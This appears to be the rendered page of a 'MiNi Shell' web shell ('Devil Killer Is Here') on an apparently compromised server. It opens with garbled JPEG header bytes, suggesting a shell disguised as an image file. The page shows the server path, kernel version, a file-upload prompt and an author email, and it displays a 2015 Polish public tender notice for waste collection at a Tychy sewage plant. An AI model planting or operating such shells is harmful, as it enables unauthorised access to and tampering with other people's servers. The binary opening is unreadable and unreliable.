JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/296374-N-2015.html

<p class="kh_header"><b>Tychy: Odbiór odpadów niebezpiecznych i innych niż niebezpieczne z terenu Oczyszczalni Ścieków Tychy-Urbanowice oraz ich transport i zagospodarowanie</b><br>
<b>Numer ogłoszenia: 296374 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów niebezpiecznych i innych niż niebezpieczne z terenu Oczyszczalni Ścieków Tychy-Urbanowice oraz ich transport i zagospodarowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia obejmuje 2 części zamówienia: - Części 1 zamówienia: odbiór, transport i zagospodarowanie odpadów niebezpiecznych i innych niż niebezpieczne; - Części 2 zamówienia: odbiór, transport i zagospodarowanie odpadów innych niż niebezpieczne. Wykonawca może złożyć ofertę częściową na jedną lub więcej części zamówienia. 2. Szczegółowy opis przedmiotu zamówienia wraz z ilościami podano w tabeli, w pkt III.3. dla części 1 i 2 zamówienia. 3. Miejsce odbioru przedmiotu zamówienia: Oczyszczalnia Ścieków Tychy-Urbanowice ul. Lokalna, 43-100 Tychy. 4. Wymagania stawiane Wykonawcom: dla części 1 zamówienia: 1) Odbiór odpadów odbywać się będzie po wcześniejszym, co najmniej 7-dniowym zgłoszeniu przez Zamawiającego, faksem lub drogą elektroniczną. W zgłoszeniu Zamawiający poinformuje o szacowanej ilości odpadów. 2) Częstotliwość odbioru odpadów: zgodnie z zapotrzebowaniem Zamawiającego. 3) Odpady gromadzone są selektywnie, w oddzielnych, specjalnie przygotowanych pojemnikach Zamawiającego. 4) Transport odpadów z miejsca ich wytwarzania do miejsca zbierania lub odzysku lub unieszkodliwiania odbywał się będzie w pojemnikach Wykonawcy Usługi. 5) Załadunek odpadów z pojemników Zamawiającego do pojemników Wykonawcy będzie wykonany przez Wykonawcę. Odpady o kodach 16 05 06*, 16 05 07*, 16 05 08* będą przekazywane Wykonawcy w pojemnikach Zamawiającego. 6) Wykonawca każdorazowo przed wywozem odpadu 17 01 02 dostarczy na własny koszt do Zamawiającego kontener do wywozu gruzu betonowego oraz odpadów z betonu na okres 24 godzin. Załadunek odpadów po stronie Zamawiającego. 7) Dopuszcza się zbiorczy, selektywny odbiór wszystkich odpadów (podczas jednego transportu), pod warunkiem, że łączna masa przekazywanych odpadów nie będzie przekraczała dopuszczalnej ładowności samochodu transportującego odpady. Dla części 2 zamówienia: 1) Odbiór odpadów odbywać się będzie po wcześniejszym, co najmniej 1-dniowym zgłoszeniu przez Zamawiającego, faksem lub drogą elektroniczną. W zgłoszeniu Zamawiający poinformuje o szacowanej ilości odpadów. 2) Szacunkowa częstotliwość odbioru odpadów: - odbiór skratek 2x w miesiącu, zgodnie z zapotrzebowaniem Zamawiającego, - odbiór piasku 2x w miesiącu, zgodnie z zapotrzebowaniem Zamawiającego. 3) Wykonawca ma obowiązek dostarczyć na własny koszt kontenery przystosowane do przewozu odpadów: skratek i zawartości piaskowników (tzw. piasku), w których odpady będą wywożone do miejsca zbierania lub odzysku lub unieszkodliwiania. 4) Wykonawca na własny koszt dostarczy 1 kontener na piasek o ładowności co najmniej 13 Mg oraz 1 kontener na skratki o ładowności co najmniej 7 Mg. 5) Wykonawca zobowiązany jest zapewnić kontener na piasek o maksymalnych wymiarach: szerokość: 2,80m, wysokość: 1,60m, długość: bez ograniczeń. 6) Kontener na piasek ma być wyposażony w króciec 2 z zamontowanym wewnątrz sitem umożliwiającym odpływ nadmiaru wody z kontenera do istniejącej kanalizacji. Króciec ten jest konieczny do odprowadzenia odcieku, podczas etapu gromadzenia piasku w kontenerze. 7) Skratki gromadzone będą przez Zamawiającego w szczelnych rękawach foliowych, na specjalnie wyznaczonym i przygotowanym placu w kontenerach należących do Wykonawcy i dostarczonych przez Wykonawcę na własny koszt. Załadunek odpadu do kontenera Wykonawcy spoczywa po stronie Zamawiającego. 8) Wykonawca dostarczy do Zamawiającego kontenery do gromadzenia skratek i piasku dokładnie opróżnione. 9) W przypadku odbioru skratek dopuszcza się rozwiązanie alternatywne, polegające na zastosowaniu dwóch typów kontenerów, w których będą gromadzone, a następnie wywożone skratki. Maksymalne wymiary kontenerów: - pierwszy typ: długość 4,0m, szerokość: 2,50m, wysokość 2,0 m; - 2 szt. - drugi typ: długość 4,0m, szerokość: 2,2m, wysokość 1,45m. - 1 szt. Kontenery powinny być posadowione na wózku/przyczepie z gumowymi kołami, który ma mieć możliwość podłączenia do ciągnika rolniczego. 10) Podczas odbioru skratek i piasku, Wykonawca odbiera pełne kontenery i przekazuje w ich miejsce Zamawiającemu puste kontenery, o parametrach podanych w pkt. 4, 5 lub 9). 11) Wskazane jest, aby odbiór skratek i piasku odbywał się w odpowiednich kontenerach na podstawie tego samego, wspólnego zlecenia, podczas jednego kursu. Dla części 1 i 2 zamówienia: 1)Wykonawca zobowiązany będzie wykonywać przedmiot zamówienia z należytą starannością, posiadanymi kwalifikacjami i wiedzą techniczną oraz zgodnie z obowiązującymi przepisami, w szczególności z Ustawą z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2001 Nr 62 poz. 627 z późn. zm.), Ustawą z dnia 14.12.2012 r. o odpadach, (Dz.U. z 2013 poz. 21), wraz przepisami wykonawczymi do Ustaw i innymi przepisami mającymi wpływ na realizację zamówienia. 2) W przypadku zmian przepisów prawa w zakresie realizacji przedmiotu zamówienia, Wykonawca zobowiązany będzie do stosowania się do nich, bez obciążenia Zamawiającego dodatkowymi nieprzewidzianymi czynnościami, a w szczególności dodatkowymi obciążeniami finansowymi, z wyłączeniem obowiązków leżących po stronie Zamawiającego nałożonych na niego zmianą prawa. 3)Wywóz odpadów z oczyszczalni może odbywać się dla części 1: w dni robocze - od poniedziałku do piątku, w godz. 700-1400, dla części 2: przez 7 dni w tygodniu 24 godziny na dobę, w terminie wskazanym w pkt. IV SIWZ. 4) Wykonawca odpowiedzialny będzie za przebieg oraz terminowe wykonanie zamówienia. 5) Wykonawca odpowiedzialny jest za należyte wykonanie usługi odbioru, transportu i zagospodarowania odpadów. 6) Wymagana jest należyta staranność przy realizacji zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.20.00-9, 90.51.30.00-6, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do złożenia oferty Wykonawca winien wnieść wadium dla części 2 zamówienia w wysokości 1 900,00 PLN (słownie: jeden tysiąc dziewięćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek jeżeli załączą do oferty: - wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz oraz - decyzję odpowiedniego organu zezwalającą na transport odpadów. Zezwolenie powinno obejmować wszystkie rodzaje wytwarzanych przez Zamawiającego odpadów wyszczególnionych w pkt. III.3 SIWZ (odpowiednio dla części 1 i 2 zamówienia), - decyzję odpowiedniego organu zezwalającą na zbieranie odpadów lub decyzję odpowiedniego organu zezwalającą na odzysk lub unieszkodliwianie odpadów. Zezwolenie powinno obejmować wszystkie rodzaje wytwarzanych przez Zamawiającego odpadów wyszczególnionych w pkt. III.3 SIWZ (odpowiednio dla części 1 i 2 zamówienia), - pismo potwierdzające wpis do rejestru przedsiębiorców i organizacji odzysku sprzętu elektrycznego i elektronicznego (dotyczy części 1 zamówienia). Decyzje oraz pismo, o których mowa powyżej muszą być aktualne na dzień składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dotyczy części 1 i 2 zamówienia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dotyczy części 1 i 2 zamówienia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dotyczy części 1 i 2 zamówienia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dotyczy części 1 i 2 zamówienia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z IPU - załącznikiem nr 6 do SIWZ. Zmiana umowy jest dopuszczalna w następujących przypadkach: a) konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody np. ulewne opady deszczu, nadzwyczajne, ponadnormatywne opady śniegu, niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny - w zakresie zmiany terminów realizacji umowy określonych w §3 i §8, b) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, c) jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), dla faktur wystawionych po zmianie stawki podatku, podatek VAT będzie obliczony w obowiązującej stawce, bez konieczności zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A., Al. M. Piłsudskiego 12, 43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 09:00, miejsce: w siedzibie Regionalnego Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414 - Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z SIWZ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> odbiór, transport i zagospodarowanie odpadów niebezpiecznych i innych niż niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis odpadów oraz ilości przeznaczone do przekazania zawarto w tabeli w pkt III.3 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.20.00-9, 90.51.30.00-6, 90.51.40.00-3, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odbiór, transport i zagospodarowanie odpadów innych niż niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis odpadów oraz ilości przeznaczone do przekazania zawarto w tabeli w pkt III.3. SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.20.00-9, 90.51.30.00-6, 90.51.40.00-3, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com